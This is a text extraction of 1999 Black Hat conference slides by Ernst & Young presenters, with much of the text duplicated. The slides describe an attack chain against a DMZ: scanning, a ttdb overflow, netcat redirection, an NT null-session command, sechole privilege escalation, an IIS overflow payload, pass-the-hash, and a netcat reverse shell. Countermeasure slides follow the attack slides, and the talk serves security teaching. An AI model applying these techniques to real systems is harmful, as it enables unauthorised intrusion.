© 1999 Ernst & Young LLP e

e treme

hackingBlack Hat 1999Black Hat 1999

Over the Router,Over the Router,Through the Through the

Firewall,Firewall,to Grandma’s to Grandma’s House We GoHouse We GoGeorge Kurtz & Eric George Kurtz & Eric

SchultzeSchultze

Ernst & Young LLPErnst & Young LLP

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Session ObjectiveSession Objective Discuss common DMZ and Discuss common DMZ and

host configuration host configuration weaknessesweaknesses

Demonstrate what may Demonstrate what may happen if a hacker were to happen if a hacker were to exploit these weaknessesexploit these weaknesses

Present countermeasures to Present countermeasures to help secure the network and help secure the network and related hostsrelated hosts

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Network DiagramNetwork Diagram10.1.1.20

10.1.1.10

172.16.1.200

172.16.1.50

192.168.1.20

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Network DesignNetwork Design Internet router is blocking Internet router is blocking

tcp/udp ports 135-139tcp/udp ports 135-139 NT Web Server (SP3) is NT Web Server (SP3) is

dual-homeddual-homed Firewall allows only outbound Firewall allows only outbound

http (80) and smtp (25) traffichttp (80) and smtp (25) traffic

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Hacker’s ObjectiveHacker’s Objective

Gain Control over Gain Control over Internal NT Server from Internal NT Server from

the Internetthe Internet

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999SysAdmin’s ObjectiveSysAdmin’s Objective

Identify Holes in the Identify Holes in the Environment and Close Environment and Close

ThemThem

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Target SelectionTarget Selection Ping SweepPing Sweep

gping, fpinggping, fping Port ScanPort Scan

nmapnmap NetscanTools Pro 2000NetscanTools Pro 2000

OS IdentificationOS Identification nmap -Onmap -O quesoqueso

Banner GrabbingBanner Grabbing VisualRoute, NetcatVisualRoute, Netcat

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999ttdbttdb Buffer overflow in Buffer overflow in

rpc.ttdbserverrpc.ttdbserver Allows user to execute Allows user to execute

arbitrary codearbitrary code Arbitrary code may be Arbitrary code may be

executed that will shell back executed that will shell back xterm as rootxterm as root

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Netcat RedirectionNetcat Redirection

10.1.1.20

172.16.1.50

172.16.1.200

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Netcat RedirectionNetcat Redirection Attack Linux listens on 139 and Attack Linux listens on 139 and

redirects to 1139 on Sparcredirects to 1139 on Sparc Sparc listens on 1139 and Sparc listens on 1139 and

redirects to 139 on NT Web redirects to 139 on NT Web ServerServer

Attack NT issues NetBIOS Attack NT issues NetBIOS request to Attack Linuxrequest to Attack Linux

NetBIOS request is forwarded NetBIOS request is forwarded over Router to NT Web Serverover Router to NT Web Server

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Enumerate NT Enumerate NT InformationInformation Null SessionNull Session

net use \\172.16.1.50\ipc$ “” net use \\172.16.1.50\ipc$ “” /user:””/user:””

NetUserEnum NetUserEnum (local, global, DumpACL)(local, global, DumpACL)

NetWkstaTransportEnumNetWkstaTransportEnum(Getmac)(Getmac)

RpcMgmt QueryRpcMgmt Query(EPDump)(EPDump)

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Privilege EscalationPrivilege Escalation Plant sechole on NT ServerPlant sechole on NT Server Execute sechole via httpExecute sechole via http

IUSR account becomes adminIUSR account becomes admin Add new user account (via Add new user account (via

http)http) Add new user account to Add new user account to

Administrator group (via http)Administrator group (via http)

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999IIS Buffer OverflowIIS Buffer Overflow Determine if Server is Determine if Server is

vulnerablevulnerable nc 172.16.1.200 80nc 172.16.1.200 80 GET /.htr HTTP/1.0GET /.htr HTTP/1.0 Evaluate responseEvaluate response

Crash IIS and Send PayloadCrash IIS and Send Payload Target server contacts our web Target server contacts our web

server and downloads payloadserver and downloads payload payload executes on server and payload executes on server and

contacts our attack hostcontacts our attack host

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999VNCVNC

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Pass The HashPass The Hash Modified SMB clientModified SMB client can can

mount shares (C$, etc) on a mount shares (C$, etc) on a remote NT host using only the remote NT host using only the username and password hashusername and password hash

No need to “decrypt” the No need to “decrypt” the password hashpassword hash

Concept first presented by Concept first presented by Paul Ashton in an NTBugtraq Paul Ashton in an NTBugtraq postpost

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Pass The Hash v.2Pass The Hash v.2 Create an admin account on Create an admin account on

our own our own NTNT host with same host with same name as the admin account for name as the admin account for which we have hash valueswhich we have hash values

Upload the hash values into Upload the hash values into memory on our own NT hostmemory on our own NT host

Perform pass-through Perform pass-through authentication to target hostauthentication to target host

No need to “decrypt” the No need to “decrypt” the passwordpassword

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Network DiagramNetwork Diagram

10.1.1.20

172.16.1.200

172.16.1.50

192.168.1.20

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Shovel The ShellShovel The Shell

10.1.1.20

192.168.1.20

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Shovel The ShellShovel The Shell Launch two Netcat Listeners Launch two Netcat Listeners

on Attack1a (ports 80 and 25)on Attack1a (ports 80 and 25) Execute Trojan on NT Server:Execute Trojan on NT Server:

Netcat Netcat TOTO port 80 on AttackLinux port 80 on AttackLinux Commands typed on AttackLinux Commands typed on AttackLinux

(port 80) are piped to CMD.exe on (port 80) are piped to CMD.exe on NT ServerNT Server

CMD.exe output is Netcatted CMD.exe output is Netcatted TOTO port 25 on AttackLinuxport 25 on AttackLinux

Type commands in 80 Type commands in 80 window, view output in 25 window, view output in 25 windowwindow

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Network Network CountermeasuresCountermeasures Block ALL ports at the border Block ALL ports at the border

routersrouters Open only those ports that Open only those ports that

support your security policysupport your security policy Review LogsReview Logs Implement Network and Host Implement Network and Host

Intrusion DetectionIntrusion Detection

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Unix CountermeasuresUnix Countermeasures TTDBTTDB

Kill the "rpc.ttdbserverd" process Kill the "rpc.ttdbserverd" process Apply vendor specific patchesApply vendor specific patches Block low and high numbered RPC Block low and high numbered RPC

locator services at the border routerlocator services at the border router

XtermXterm Remove trusted relationships with Remove trusted relationships with

xhost -xhost - If sending sessions to another If sending sessions to another

terminal, restrict to a specific terminal, restrict to a specific terminalterminal

Block ports 6000-6063 if necessaryBlock ports 6000-6063 if necessary

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999

NT CountermeasuresNT Countermeasures Block tcp and udp ports 135, Block tcp and udp ports 135,

137, 138 and 139 at the router.137, 138 and 139 at the router. Prevent Information leakage:Prevent Information leakage:

Utilize the Restrict anonymous Utilize the Restrict anonymous registry key:registry key:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Lsa\ RestrictAnonymous DWORD =1Control\Lsa\ RestrictAnonymous DWORD =1

Unbind “WINS Client (TCP/IP)” Unbind “WINS Client (TCP/IP)” from the Internet-connected from the Internet-connected NICNIC

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999

NT CountermeasuresNT Countermeasures Password compositionPassword composition

7 characters is the strongest 7 characters is the strongest humanly usable length, 14 is the humanly usable length, 14 is the strongeststrongest

Use meta-characters within the first Use meta-characters within the first 7 characters of your password7 characters of your password

Utilize account lockoutUtilize account lockout Utilize the passfilt.dll to require Utilize the passfilt.dll to require

stronger passwordsstronger passwords Utilize Passprop.exe admin lockout Utilize Passprop.exe admin lockout

featurefeature

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999

NT CountermeasuresNT Countermeasures Apply current service packs and Apply current service packs and

security related hotfixessecurity related hotfixes Review IIS security checklist:Review IIS security checklist:

www.microsoft.com/security/products/iis/www.microsoft.com/security/products/iis/CheckList.aspCheckList.asp

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999

CountermeasuresCountermeasures

Disclaimer:Disclaimer: Test all changes on a non-Test all changes on a non-

production host before production host before implementing on implementing on production serversproduction servers

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Tools and ConceptsTools and Concepts Visual RouteVisual Route www.visualroute.comwww.visualroute.com NetScanTools ProNetScanTools Pro www.nwpsw.comwww.nwpsw.com gping, fpinggping, fping www.securityfocus.comwww.securityfocus.com nmapnmap www.insecure.org/www.insecure.org/

nmap/nmap/ quesoqueso www.apostols.org/www.apostols.org/

projectz/projectz/ ttdb exploitttdb exploit www.securityfocus.comwww.securityfocus.com netcatnetcat www.l0pht.com www.l0pht.com rinetdrinetd www.boutell.comwww.boutell.com

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Tools and ConceptsTools and Concepts VMWareVMWare www.vmware.comwww.vmware.com NT Resource KitNT Resource Kit www.microsoft.comwww.microsoft.com DumpACLDumpACL www.somarsoft.comwww.somarsoft.com secholesechole www.cybermedia.co.inwww.cybermedia.co.in pwdumppwdump www.rootshell.comwww.rootshell.com L0phtCrackL0phtCrack www.l0pht.comwww.l0pht.com VNCVNC

www.uk.research.att.comwww.uk.research.att.com modified SMB clientmodified SMB client www.ntbugtraq.comwww.ntbugtraq.com

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Security ResourcesSecurity Resources www.microsoft.com/securitywww.microsoft.com/security

AdvisoriesAdvisories PatchesPatches IIS Security ChecklistIIS Security Checklist

www.securityfocus.comwww.securityfocus.com Bugtraq Mailing ListBugtraq Mailing List Tools, Books, LinksTools, Books, Links Vulnerabilities and FixesVulnerabilities and Fixes

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Osborne/ McGraw-HillOsborne/ McGraw-Hill

Hacking Exposed: Network Hacking Exposed: Network SecuritySecurity

Secrets and SolutionsSecrets and Solutions

George KurtzGeorge Kurtz

Stuart McClureStuart McClure

Joel ScambrayJoel Scambray

Due Out September 1999Due Out September 1999

e © 1999 Ernst & Young LLP

e treme

hackingBlack Hat 1999Black Hat 1999Contact InformationContact Information George KurtzGeorge Kurtz

george.kurtz@ey.comgeorge.kurtz@ey.com (201) 836-5280(201) 836-5280

Eric SchultzeEric Schultze eric.schultze@ey.comeric.schultze@ey.com (425) 990-6916(425) 990-6916

Web SiteWeb Site www.ey.com/securitywww.ey.com/security